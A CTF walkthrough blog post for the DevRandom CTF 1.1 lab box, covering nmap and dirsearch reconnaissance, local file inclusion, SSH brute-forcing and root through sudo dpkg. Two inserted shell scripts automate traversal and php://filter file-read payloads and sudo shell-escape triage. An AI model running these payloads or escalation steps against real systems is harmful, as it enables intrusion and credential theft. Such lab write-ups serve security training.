DevRandom CTF_1.1 Box

Information gathering

┌──(kali㉿kali)-[~/Downloads/devrandomCTF_v1.1]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.137
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-30 21:50 EDT
Nmap scan report for 192.168.56.137
Host is up (0.00042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:4F:E8:0F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.13 seconds
┌──(kali㉿kali)-[~/Downloads/devrandomCTF_v1.1]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.56.137
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-30 21:50 EDT
Nmap scan report for 192.168.56.137
Host is up (0.00042s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 83:e5:a1:51:b1:f6:98:d3:19:e7:59:10:f7:f4:e8:5e (RSA)
| 256 b2:a6:79:c3:ad:2f:ba:cc:02:b3:42:0d:a2:a3:9e:60 (ECDSA)
|_ 256 ec:1f:d4:29:9f:a5:ae:ca:93:f4:a8:6b:fd:61:44:45 (ED25519)
80/tcp open http Apache httpd
| http-robots.txt: 3 disallowed entries
|_/wp-admin/ /wp-login.php /?include=info
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:4F:E8:0F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.46 seconds
┌──(kali㉿kali)-[~/Downloads/devrandomCTF_v1.1]
└─$ sudo nmap --script=vuln -p22,80 192.168.56.137
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-30 21:55 EDT
Nmap scan report for 192.168.56.137
Host is up (0.00062s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /wp-login.php: Possible admin folder
| /log.php: Logs
| /robots.txt: Robots file
| /readme.html: Wordpress version: 2
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
|_ /secret/: Potentially interesting folder w/ directory listing
MAC Address: 08:00:27:4F:E8:0F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 37.88 seconds
┌──(kali㉿kali)-[~/Downloads/devrandomCTF_v1.1]
└─$ sudo nmap --top-ports 20 -sU 192.168.56.137
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-30 22:49 EDT
Nmap scan report for 192.168.56.137
Host is up (0.00042s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 08:00:27:4F:E8:0F (Oracle VirtualBox virtual NIC)

The exposed surface is very narrow: only SSH and HTTP, and UDP shows nothing useful. It feels like directory brute-forcing is the only thing left to try (obviously, since apart from directory brute-forcing there is no other foothold).

Directory brute-forcing

Run a round of directory brute-forcing, trying both gobuster and dirsearch.

dirsearch -u http://192.168.56.137/

Summary of what was found:

/secret/
/arizona
API:4395874598yt3r9iy98r7r90t87treterrrrr
/wrap
john:Password123

/robots.txt
/?include=info

/log.php
Records access information, including the visitor's request path and User-Agent

/secret.php
API:341290e945c081fc3c8e2c8f2b7294ca

I tried logging in with the username and password above: failed. I tried the API values as passwords: failed. Finally I fuzzed the /?include=info parameter and found a file inclusion vulnerability.

File inclusion vulnerability

Tried reading the passwd file.

That yielded several usernames, and I found no other attack path through the web app (in fact I just didn't think of it; the other path has some practical problems in use).

I tried reading some sensitive files, including the shadow file, shell history files in home directories and SSH private keys; all failed. I also tried wp-config.php, which likewise failed (failed meaning no output).
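The fuzzing of the `include` parameter and the follow-up file reads described above, as an added example that is not part of the original post. It generates the usual local-file-inclusion candidates for one file (plain path, `../` traversal at several depths with and without a trailing `%00`, and the `php://filter` base64 wrapper for pulling PHP source such as wp-config.php), fires them at the parameter, and only reports responses that look like a hit. The helper names, the target URL and the parameter name `include` are assumptions for this example; the classifier is deliberately narrow, so a silent include (no output at all, as seen on this box) shows up as "empty" rather than as a hit.

```shell
#!/usr/bin/env sh
# Added example (not from the original post): probe a PHP "include"-style
# parameter for local file inclusion. Helper names are hypothetical.

# Print candidate payloads for one file, one per line:
#   /file, ../file ... ../../../../../../file, each also with a trailing %00
#   (null-byte truncation on old PHP), then the php://filter source dump.
lfi_payloads() {
    file="$1"    # path without leading slash, e.g. etc/passwd
    printf '/%s\n' "$file"
    i=1
    prefix=''
    while [ "$i" -le 6 ]; do
        prefix="${prefix}../"
        printf '%s%s\n' "$prefix" "$file"
        printf '%s%s%%00\n' "$prefix" "$file"
        i=$((i + 1))
    done
    printf 'php://filter/convert.base64-encode/resource=%s\n' "$file"
}

# Classify a response body:
#   passwd  - contains a root entry from /etc/passwd
#   base64  - a line that looks like php://filter output (base64 of source)
#   empty   - nothing but whitespace (the include ran but printed nothing)
#   other   - anything else (normal page, error text, ...)
classify_response() {
    body="$1"
    if printf '%s' "$body" | grep -q 'root:x:0:0:'; then
        echo passwd
    elif printf '%s' "$body" | grep -Eq '^[A-Za-z0-9+/]{40,}={0,2}$'; then
        echo base64
    elif [ -z "$(printf '%s' "$body" | tr -d '[:space:]')" ]; then
        echo empty
    else
        echo other
    fi
}

# Send every payload for one file and print "<verdict><TAB><payload>" for hits.
# Payloads are appended raw so %00 reaches the server as a real null byte.
probe_lfi() {
    base="$1"; param="$2"; file="$3"
    lfi_payloads "$file" | while IFS= read -r p; do
        body=$(curl -s --max-time 5 "$base?$param=$p")
        verdict=$(classify_response "$body")
        case "$verdict" in
            passwd|base64) printf '%s\t%s\n' "$verdict" "$p" ;;
        esac
    done
}

# Usage against the box (not run automatically):
#   probe_lfi 'http://192.168.56.137/' include etc/passwd
#   probe_lfi 'http://192.168.56.137/' include var/www/html/wp-config.php
```

A `base64` hit is decoded with `base64 -d`; the `php://filter` wrapper is the way to read wp-config.php as text, since a plain include would execute it and, as on this box, print nothing.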

Next I tried SSH brute-forcing, but it took far too long and I fell into deep self-doubt; I went back to a writeup and it turns out it really does take that long. In practice, with the collected usernames as the user list and rockyou as the password list, the brute-force takes well over 4 hours.

Without that much patience, I went to the writeups for other ideas. One blog post mentioned that log.php stores the user-controlled User-Agent field, so a one-line PHP webshell can be written into it to get a shell. In practice I ran into the following problem:

The log that log.php used to echo is now stored in access.log, and the file inclusion cannot be used to get a reverse shell.

SSH brute-forcing

So it was back to brute-forcing; I simply took someone else's brute-force result: qwertyuiop[]

┌──(kali㉿kali)-[~/Downloads/devrandomCTF_v1.1]
└─$ ssh trevor@192.168.56.137
trevor@192.168.56.137's password:
Linux lucifer 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Mar 23 17:54:37 2020
trevor@lucifer:~$ whoami
trevor
trevor@lucifer:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:4f:e8:0f brd ff:ff:ff:ff:ff:ff
inet 192.168.56.137/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 454sec preferred_lft 454sec
inet6 fe80::a00:27ff:fe4f:e80f/64 scope link
valid_lft forever preferred_lft forever
trevor@lucifer:~$ id
uid=1005(trevor) gid=1005(trevor) groups=1005(trevor)
trevor@lucifer:~$ sudo -l
Matching Defaults entries for trevor on lucifer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User trevor may run the following commands on lucifer:
(root) NOPASSWD: /usr/bin/dpkg

Privilege escalation

sudo -l shows that dpkg can be run as root without a password, and GTFOBins has a technique for it.
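The sudo triage step above, as an added example that is not part of the original post: a small shell helper that pulls the binaries out of the NOPASSWD lines of `sudo -l` output and flags the ones GTFOBins lists as giving a shell through sudo. The sample `sudo -l` text is constructed to match what trevor sees on lucifer; the helper names and the short binary list are assumptions for this example. The dpkg trick itself is the GTFOBins one: `sudo dpkg -l` hands its listing to a pager when stdout is a terminal, and `!/bin/sh` typed at the pager prompt spawns the shell as root.

```shell
#!/usr/bin/env sh
# Added example (not from the original post): triage `sudo -l` output.
# Helper names and the binary list below are hypothetical.

# Subset of GTFOBins entries that yield a shell when run via sudo.
# dpkg: `sudo dpkg -l` pages its output (less) on a terminal; `!/bin/sh`
# at the pager prompt gives a root shell. No pager is used when stdout is
# not a tty, so this only works interactively.
GTFO_SUDO_BINS='dpkg apt apt-get less more man vi vim nano find awk'

# Read `sudo -l` output on stdin, print the basename of every program that
# appears in a NOPASSWD rule, one per line. Handles comma-separated lists
# and strips any arguments given in the rule.
nopasswd_bins() {
    # Rule lines look like:   (root) NOPASSWD: /usr/bin/dpkg
    grep -E '^[[:space:]]*\([^)]*\)[[:space:]]+NOPASSWD:' |
        sed -E 's/.*NOPASSWD:[[:space:]]*//' |
        tr ',' '\n' |
        sed -E 's/^[[:space:]]*//; s/[[:space:]].*$//' |
        sed -E 's#.*/##'
}

# Print "<bin><TAB>gtfobins" for known shell escapes, "<bin><TAB>-" otherwise.
triage_sudo() {
    nopasswd_bins | while IFS= read -r b; do
        case " $GTFO_SUDO_BINS " in
            *" $b "*) printf '%s\tgtfobins\n' "$b" ;;
            *)        printf '%s\t-\n' "$b" ;;
        esac
    done
}

# Constructed sample: the `sudo -l` output trevor sees on lucifer.
SAMPLE_SUDO_L='Matching Defaults entries for trevor on lucifer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User trevor may run the following commands on lucifer:
    (root) NOPASSWD: /usr/bin/dpkg'

# Live use on the box:   sudo -l | triage_sudo
# On the sample:         printf '%s\n' "$SAMPLE_SUDO_L" | triage_sudo
```

Anything flagged `gtfobins` is then looked up on GTFOBins for the exact invocation; for dpkg that is the pager escape described above, which is how the root shell in the next listing is obtained.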

root@lucifer:/home/trevor# whoami
root
root@lucifer:/home/trevor# cd /root
root@lucifer:~# ls
flag.txt
root@lucifer:~# cat flag.txt
WELl DONE

echo "THISISTHEFLAGTHISISTHEFLAG\!\!\!\@\@\@###" | base64 > thisistheflag.txt

Done.


DevRandom CTF_1.1 Box
https://i3eg1nner.github.io/2023/08/ddeff39afd9a.html
Author: I3eg1nner
Published: 31 August 2023